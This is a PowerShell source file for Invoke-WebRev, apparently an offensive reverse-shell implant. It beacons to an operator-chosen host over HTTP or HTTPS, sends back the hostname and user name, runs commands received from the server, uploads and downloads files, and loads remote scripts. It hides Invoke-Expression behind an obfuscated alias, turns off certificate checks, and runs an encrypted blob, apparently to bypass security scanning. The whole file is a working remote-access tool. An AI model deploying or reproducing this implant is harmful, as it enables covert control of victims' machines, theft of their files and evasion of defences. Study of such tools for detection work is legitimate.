function Invoke-WebRev{ param ( [string]$ip, [string]$port, [switch]$ssl ) $help=@" .SYNOPSIS WebRev. PowerShell Function: Invoke-WebRev Author: Hector de Armas (3v4Si0N) Required Dependencies: Powershell >= v3.0 Optional Dependencies: None .DESCRIPTION . .ARGUMENTS -ip Remote Host -port Remote Port -ssl Send traffic over ssl .EXAMPLE Invoke-Webrev -ip 192.168.29.131 -port 80 Invoke-Webrev -ip 192.168.29.131 -port 443 -ssl "@ if(-not $ip -or -not $port) { return $help; } if ($ssl) { $url="https://" + $ip + ":" + $port + "/"; } else { $url="http://" + $ip + ":" + $port + "/"; } [array]$shurmano = "I","n","t","E","r","n","e","X" ;set-alias taleska-ei-vrixeka $($shurmano | foreach { if ($_ -cmatch '[A-Z]' -eq $true) {$x += $_}}; $x) $pwd_b64 = getPwd; $hname = toBase64 -str "$env:computername"; $cuser = toBase64 -str "$env:username"; $json = '{"type":"newclient", "result":"", "pwd":"' + $pwd_b64 + '", "cuser":"' + $cuser + '", "hostname":"' + $hname + '"}'; [System.Net.WebRequest]::DefaultWebProxy = [System.Net.WebRequest]::GetSystemWebProxy(); [System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $AllProtocols = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'; [System.Net.ServicePointManager]::SecurityProtocol = $AllProtocols; [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } try { $error[0] = ""; } catch {} PatchMe; $previous_functions = (ls function:).Name; [array]$preloaded_functions = (ls function: | Where-Object {($_.name).Length -ge "4"} | select-object name | format-table -HideTableHeaders | Out-String -Stream ); while ($true) { try { $req = Invoke-WebRequest $url -useb -Method POST -Body $json -UserAgent "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" -ContentType "application/json"; $header = $req.Headers["Authorization"]; $c = [System.Convert]::FromBase64String($header); $cstr = [System.Text.Encoding]::UTF8.GetString($c); $result = ""; $dataToSend = ""; if($cstr.split(" ")[0] -eq "autocomplete") { $functs = (Get-Command | Where-Object {($_.name).Length -ge "4"} | select-object name | format-table -HideTableHeaders | Out-String -Stream); $functs = toBase64 -str "$functs"; $type = '"type":"4UT0C0MPL3T3"'; $result = $functs; } elseif($cstr.split(" ")[0] -eq "upload") { $type = '"type":"UPL04D"'; try { $uploadData = [System.Text.Encoding]::ASCII.GetString($req.Content); if ($cstr.split(" ").Length -eq 3) { $location = $cstr.split(" ")[2]; } elseif ($cstr.Substring($cstr.Length-1) -eq '"') { $location = $cstr.split('"') | Select-Object -SkipLast 1 | Select-Object -Last 1; } else { $location = $cstr.split(' ') | Select-Object -Last 1;; } $content = [System.Convert]::FromBase64String($uploadData); $content | Set-Content $location -Encoding Byte $result = '[+] File successfully uploaded.'; } catch {} } elseif($cstr.split(" ")[0] -eq "download") { $type = '"type":"D0WNL04D"'; try { if ($cstr.split(" ").Length -eq 3){ $cstr = $cstr.Replace('"', ''); $pathSrc = $cstr.split(" ")[1]; $pathDst = $cstr.split(" ")[2]; } elseif ($cstr.Substring($cstr.Length-1) -eq '"'){ if ($cstr.split(' ')[1][0] -eq '"') { $pathSrc = $cstr.split('"')[1]; } else { $pathSrc = $cstr.split(' ')[1]; } $pathDst = $cstr.split('"')[-2]; } else{ $pathSrc = $cstr.split('"')[1]; $pathDst = $cstr.split(' ')[-1]; } if (Test-Path -Path $pathSrc) { $downloadData = [System.IO.File]::ReadAllBytes($pathSrc); $b64 = [System.Convert]::ToBase64String($downloadData); $result = '[+] File successfully downloaded.' $type = $type + ', "file":"' + $b64 + '", ' + '"pathDst":"' + $pathDst + '"'; } else { $type = '"type":"3RR0R"'; $result = '[!] Source file not found!'; } } catch {} } elseif($cstr.split(" ")[0] -eq "loadps1") { $type = '"type":"L04DPS1"'; try { $loadData = [System.Text.Encoding]::ASCII.GetString($req.Content); $loadData = $loadData.ToCharArray(); [array]::Reverse($loadData); $loadData = -join($loadData); $content = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($loadData)); taleska-ei-vrixeka $content | Out-String; $result = '[+] File loaded sucessfully.' } catch { $type = '"type":"3RR0R"'; $result = '[!] Error loading PS1!'; } } else { $type = '"type":"C0MM4ND"'; $enc = [system.Text.Encoding]::UTF8; $new = (taleska-ei-vrixeka $cstr | Out-String); $bytes = $enc.GetBytes($new); $bytes2 = $enc.GetBytes($result); $result = [Convert]::ToBase64String($bytes2 + $bytes); } if ($cstr.split(" ")[0] -eq "cd") { $pwd_b64 = getPwd; } $json = '{' + $type + ', "result":"' + $result + '", "pwd":"' + $pwd_b64 + '"}'; } catch { if ($error[0] -ne "") { try { $type = '"type":"3RR0R"'; $err = $error[0] | Out-String; $error[0]= ""; $bytes = $enc.GetBytes($err); $result = [Convert]::ToBase64String($bytes); $json = '{' + $type + ', "result":"' + $result + '", "pwd":"' + $pwd_b64 + '", "cuser":"' + $cuser + '", "hostname":"' + $hname + '"}' } catch {} } }; }; } function toBase64 { Param([String] $str) $enc = [system.Text.Encoding]::UTF8; $bytes = $enc.GetBytes($str); $result = [Convert]::ToBase64String($bytes); return $result; } function getPwd() { $enc = [system.Text.Encoding]::UTF8; $pwd = "pwd | Format-Table -HideTableHeaders"; $pwd_res = (taleska-ei-vrixeka $pwd | Out-String); $bytes = $enc.GetBytes($pwd_res); $pwd_b64 = [Convert]::ToBase64String($bytes); return $pwd_b64; } function Get-ImportedFunctions { $menu = "" if ([int]$PSVersionTable.PSVersion.Major -ge 4 ) { $current_functions = (ls function:).Name [array]$preloaded_functions = "Close_Console","Close_DNS","Close_TCP","Close_UDP","Main","Main_Powershell","ReadData_CMD","ReadData_Console","ReadData_DNS","ReadData_TCP","ReadData_UDP","Setup_CMD","Setup_Console","Setup_DNS","Setup_TCP","Setup_UDP", "Stream1_Close","Stream1_ReadData","Stream1_Setup","Stream1_WriteData","WriteData_CMD","WriteData_Console","WriteData_DNS","WriteData_TCP","WriteData_UDP","Close_CMD","menu","f","func" $current_functions = $current_functions + $preloaded_functions $new_functions = (Compare-Object -ReferenceObject $previous_functions -DifferenceObject $current_functions).InputObject $output = foreach ($new_function in $new_functions) { if ($preloaded_functions -notcontains $new_function) {"`n [+] $new_function"}} $menu = $menu + $output + "`n"; } else { [array]$new_functions = (ls function: | Where-Object {($_.name).Length -ge "4" -and $_.name -notlike "Close_*" -and $_.name -notlike "ReadData_*" -and $_.name -notlike "Setup_*" -and $_.name -notlike "Stream1_*" -and $_.name -notlike "WriteData_*" -and $_.name -notlike "Menu" -and $_.name -ne "f" -and $_.name -ne "func" -and $_.name -ne "Main" -and $_.name -ne "Main_Powershell"} | select-object name | format-table -HideTableHeaders | Out-String -Stream ) $show_functions = ($new_functions | where {$preloaded_functions -notcontains $_}) | foreach {"`n[+] $_"} $show_functions = $show_functions -replace " ","" $menu = $menu + $show_functions + "`n" $menu = $menu -replace " [+]","[+]" } return $menu; } function PatchMe { $s256 = New-Object System.Security.Cryptography.SHA256CryptoServiceProvider $k = $s256.ComputeHash(@(76,49,107,48,114,45,100,51,45,66,51,76,76,48,116,52)) $scrt = "76492d1116743f0423413b16050a5345MgB8AG8ASwBMAEYATgBkAE4AYwA0ADEAcgBBAGsAKwBZAGMARwBWAEwAQwBwAFEAPQA9AHwAYgA1ADMAZQA1AGYAMwA1ADUAZQAyAGUAZQA4ADQAMwA0ADYAMAAxADAAMgA4ADgAMAAyADQAMQAyADgAOQA2ADYANQBkAGEAMwBlAGEAZQBjADkAMgA2ADMANQAyAGQAZgAyAGIAMgBiADQAYgBhADMAMAAxADYAOQA3ADkAZQAyADYAZABkAGIANQA1ADcAOAA5AGMAZgBmAGEANQAxAGUANwBlAGEAZgA1ADAAMgAwADYAMgAxADgAZgA4ADgAZAA2ADgAMAA3ADUANgA1ADUANwA4ADcANQBmADEAMgA3ADEAMgA2ADkAMwA3ADYANgAyADQAOQA5AGMAYQAwADQAYwA2ADQAMQBiADIAOQAwADQAYQA1ADgAOAA0ADUAZgBkADUAOABiADIAZgA5ADgANwA4AGEAMwBmADYAMQAyADgAMQBhADUAZAA2ADUAMAAxADAANQAyADEAOQAwAGYANwA4ADIAZgBlAGIANgBjADgAYgBiADAAYwA5ADcAMwA4ADYAZQA1AGEAMgBhADUAZABlAGQAYQBhADIAYgA0ADQANgA0AGIAZAAxAGUAZAA2ADIANQBiADIAOQBkADMAMgA3ADEAYwBkADgAZABmADYAYwAzAGYANwA5ADEAZABhADcANQBiAGQAYwBiAGEAYwBiADkANgA1ADAAOABiAGEANQBlAGQAZgA1ADMAOABhADYAZAAxADkANgBlADgAZABkAGUANQAzADIAYQA5AGUAOQBmADcANAAyADQANABhAGMAMwBlADMAMgA0ADAANQAxADUAOQBhADIAMwBjAGIAOQA0AGEAMQAxADIAYQBkADAAMgBlADIANgBlAGQAOAAzADAAZgAyAGQAZAAyADMAMgA2AGUAMQA0ADQAOQBkADIAMwBlADgAOABiADAANQAxADEAZgBjADQAYgBkADgANAA5AGIAZQAzAGYANQAzAGEAMQBlAGUAYgAzAGQAMwBhADEAOAA3ADQAMABkADUAZABjADUAZgBkADIAMwBjADEANQA3ADkAOAA1ADkAYQA5ADkAMQA5ADUANwBiAGIAZQA2ADcAMgA4ADQAYwBkAGIAOAA1ADEAMwA1ADUANQAzADgAYwA0AGUAZgBkADIANAA0ADUANAA5ADIAYwA3ADUAOQA1ADQAOQBhADYAYwBmADIANQAxADgANQAwADEANQAwADcANAA3ADMAZgA2ADAANABkAGEAZQA4ADkAMABiADEAZAA2ADIAYgAzAGYAYgBkADMAYgA1ADQAYwBiADAANgAwADQAMwBjAGIAYQAwAGEAZAA1ADMAZQAxAGIANgAyAGUAMwAzADgAZAA1ADMAMwBlAGMAOQA4ADUAYQA4AGYAMAAxAGIAMQBiADAAOAA2AGIAYgBjAGUANAA1ADAAOQBmADgANwA4AGMAZABlAGYAZQAyAGIAZgA3ADQAMAA3ADEAYQA5ADYAYwAxADgAOAA2AGMAZQBiADkAYgBlADIAMAA2AGYAMQBmAGEAOQBiAGEANAA1ADEAMgA3ADkAZgBiADEAOABiADEAMwBhAGYAZABlADIANABiADQAYwAwADgANwAwADIAMwBjAGEAMQBjAGUANQA4ADcAMgBlADYAOAA3ADIAYwBjADkAMwA2AGYAMAA1ADgANgA1ADAAOABiAGUANgAwADIANgA2ADgAZAA4AGEAMABkADkAZgA5AGEANAA0AGEAYQBmADIANgAzAGIAZAAxADYAZgBiAGYAYgA1AGQANgAwADEANgA0AGIAMwAxAGMANQAwAGMANABkAGQAYgAwADUAOQA3AGUANQBmADgAMAAxADgAYwA2AGMAYQAzAGMAMAA1AGYAOQA4ADgANQBlADUANAAxAGEAOAAwAGUAZAA5ADMANABjAGIAMQA3AGIANQBiADAAYQBlADEAYgAzADQAZgAwAGUAMwA2AGIANQAwADgAOAAxAGEANABkADMAMAA5ADcAMwAxADEANgA4ADgAMgBkADgAOQAzAGEAZABhAGUANABkADQAZgA2ADEAMwAxADcANAAxAGUAYQA4AGYAMwBkADAAZABkADcAYgA3AGEAMwA0AGUAOABjADIAYQBjADQAZgA0ADUAYgA5ADAAYgBhADYANQAzADgAMgA2ADgAMgA2AGIAMQBlAGUANwBmADIAMABhADIAMgBkADUAMQAxADMAOQAzAGIAMwA3AGYAZAAwAGQAOQA4ADkANgAyAGUAMQA1AGIAYwA5ADAAOAA0ADQAOABkAGEAMwA0ADIANQAwAGYAYQA0AGMAZABmAGYAZQA0ADEAYQAzAGQAYgBkAGUAOQBjADAAYgBhADcAZAA3AGUAZgA5ADAANQA3ADAAZgA0AGIAZAAwADIANwBlADMAMwA4ADYANgBlADcAMgAzADUAZgA2ADkAZQAxADUAOAA4AGQAYgA0AGQAOQAxAGQANgBiADEAMgAzADEAOQA4ADQAZQBhAGUAYgA5AGEANgBmADQANwAwADMANwBlAGMAYQBiAGIAZQBkADUANQAzADEAYgA2AGYANQA2ADMAMQAzADcAZgAyADQAOAA2ADUAYwAxADIAZQAxAGYAOQA0ADkAOQBmADYAMAA0ADcANgBkAGMAZABlADMAYwA2ADgAOABiAGEAOQA5ADMAYQAzADcANAA4AGIANAA3ADYAMwBlADMAYwBkADgAMwA1ADEAMQBkADIAZgA5ADAAOQBlAGIANwBmADcANAA2ADYAYQA5ADUAZQBiADIAMgAwADEAZgAzADQAOQA2AGIAZQAzADQAOAA0AGIAYgAxAGMANwAzADUAOQA2AGYANQAzAGYAZABhAGYANwA0ADMANAAxAGMAYgBhADYANAAxADUAOAA5ADUANQA3AGUAOAA1ADYAMgBjADgANgBkADcAYQA1ADMANQAyADIANQAxAGEANAA2ADkAMgA2ADUAYQA2ADAAMABhAGIAZAA4AGEAMQA5ADkAZAA5ADUAYQA5AGIAZgBlAGUAOQBmADAANwAxADAAOQA0ADYAMABiAGQANgBlAGIAOAA2ADAAYwAwADMAMgA5ADUAMQAxAGYAMABmADEANQBlADkAMQBjAGUAMgBlADYANgA3ADMAMwA0ADEAYgBhAGEAYQBhAGQAMABlADcAYQA0AGYAYQA1ADMAOABhADYAMQBlAGQAYgBkAGIAMQA2ADgANwA0AGEAZgBjADcAMAA0ADgAYQA0ADEANwAxAGIAYwBiAGIAYQA2AGQAMgAzAGIAOQA3ADIAOAAxADgAMAAzADQANQA4ADUAMgAwADUAMQA2ADUAZgA1ADIAOQBiADkAOABhAGMAOQAwAGQAMwA2AGQAZABkADgANwBhADgAMgA0ADEAMQA4ADQANgBiADEAZgAzADUANAAzAGQANQA2AGYANgBmAGEAYwA2AGQAZgBiADEAMQA1ADIAMwAxAGQANQA3ADQANgBhADQANAA4ADgANABiADAAZQA0AGIAZgBlADkAZQBhADkANABmAGEAMQBhADYANwAxAGQAZAA1ADkAYgA5ADIAMwAxADUAOAAzAGQANQAyADQAMQAzADkAZgBiADIAZQA4AGEAMgBmADYAMwBiADEAMAAzADUAMwBiADUAZQAzADEAMAA0ADIANQA5AGEANwAzADYAMgBkAGMAZABmADYAOAAyAGEANAA5ADUAMwAzADQAYwA0AGYAYgAwAGMAYwBlADQANwAzADEAZABhADMAYgA0AGUAMABlAGIAZABmADgAOQA3AGQAZgA3ADIAMwA4ADIAMQAxADcAOABhADcAMAA0AGQAMgAxADQAMQAxADYANwA3AGQAYgA4ADAAZgAwAGUAYgA2AGYAZAA2ADIAOABlADkANwBhAGQANAAzADAAYgBmADYAMABlADkAZABkADUAYgA2ADAANwA1ADcANQBkAGUAYgAxAGQANQA0ADkAZAA4AGIAOABjADQAYQA1ADQANwBkADMAYwBjADYAYwAxADcAOAA0AGYAOABmAGQAOABjADIAYwA0ADEANgBiADgAMgA5ADAAZQAxAGEAZQA2ADgAYgBiADEAOQA5ADQAYgBjAGEAYwA0ADYAMQAwADIANgA2ADgAOQA0ADgAZAA5ADcAOAAzAGEAYQAzAGYAYgA0AGMAMwA5AGQAZAAzADMAYQBkAGIAOQA3ADIAMABjAGIANwBhADEAYQA0ADUAYQA0ADAANwA5AGEANwA4ADEAZAA0ADYAMAAzAGUANgA5AGIAZgAxADMANgA1ADAAZgA1AGQAZABjADEAMwA3ADYANAA4ADQAMQBlADIAYwBjADMANgBmAGIAOAAyAGYAOAA0ADEAMgAwAGEANwA2AGIANAA0AGYAYQAzAGMAMQBjADIANQA1AGIAYgA1AGQAYQA5AGIANQAxADEAZABlADkANwBjADkAZAA3AGQAZQBiAGEAYQA0AGUANABjAGYAYgA2ADYANgA4ADgANAA3AGMANwBmADAAMwA2ADEAZAAwADgAMAAwAGEAYwAyADMANQA2AGQAOABlADkANQAxAGEAYQAxADEANQAwADAAMgBiADEANwBmAGMAZQBhADgAMwAyADQAZAAzAGUAMwA5ADMAMgA1ADYAZQA5ADMAMAAwADcAZQBmAGQAZgBhADkANABjADQAZAAwADIANgAwADUAZABmADEAMQAwADAAMAA0ADMAMwBiADMAMgA4ADgAZAA3AGUANAAwADUAMwAxADcAZABmADQANwBkADQAYwA4ADQANgBhADQAZQA2ADAANgA5ADUAMABhAGMANwAwADIAMQA2ADcAYQA5ADUAZgAyAGMAOQA2AGIAZAA0AGMAMAAzAGEAMQAxADcANwA3AGMAZgAxADkAYgA4ADAAYQBlAGIAYQAyAGEANQA3ADgAYwAyADYANQA1ADYAMAA3ADkANwBjAGIANwAzADYANgA2ADQAYgA4AGQAMAA4AGEANABmADIAOAAzADkAZgBlADkAMAA3ADkAMAAzADgAMQA5ADkAZQAyAGQANQBhADkAZQBhADIAZQBmADEANgAxADIAMQBhADUANgA4AGUANwAzADEAZgBkAGYAMAA5ADAAYwAwAGIANAA0ADEAZQBjADAAMgAxAGQAMABhAGIAYgA5AGQANQBhADYAOAAxAGYAMQAxADYAYwBiADUAZAA1AGIAMwA0ADMANwA4ADYANwAwAGEAMQAxADAAMwA1ADEAYQAxAGEAOAAzAGIAZgA2AGMAZQBmAGQAZQBlADEAMwBiADQANAA4ADAANwA2ADUAOAAwADcANABhADcAMwAxADQAMABiAGYAOQA0AGMAOQBhAGYAZgAzADQAZgAyAGEAOQBhADYANwAyAGQAZAAxAGMAOAA4AGUAYQA5AGEAMAA5ADAANABjADQAYwAwAGQAMwBhAGQAOQBkAGUAYgBmAGQAMwA2ADkAMABkADQAYgA4ADUAOAAyAGUAZQBiADkAZABmAGUANAAwAGYAOAA4AGQAOAA4ADEAZQA0AGUANgAyADYAYgAwAGIAMABiADAAYwA5ADYAZgA4ADgAYQAzADUAMgAyADQAZQAyADQAOAAxADgANgBhADAAZABjAGYANAA2ADAANwAwAGMAYwBlADkAZQBlADIANgBiADgAOQA2ADQAYwBlAGMAYQAzADEAMgBiADkANgBhAGMAMQAyADQAMwAwAGIAZgBkADMANAAzADkAYwAzADMANwAxADcANgBlADcANAAyADkAYgA5AGIAMgAxADEAYQBmAGYANAA1ADIANAAxAGIANwA0ADEAMwA5ADAAMABjADUAZQA3ADcAZABlADYAMABmADkANAA2ADgAOQBiAGYA" $scrt_ss = $scrt | ConvertTo-SecureString -Key $k $data = [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($scrt_ss)) taleska-ei-vrixeka $data; } #Invoke-WebRev -ip 192.168.224.136 -port 443 -ssl;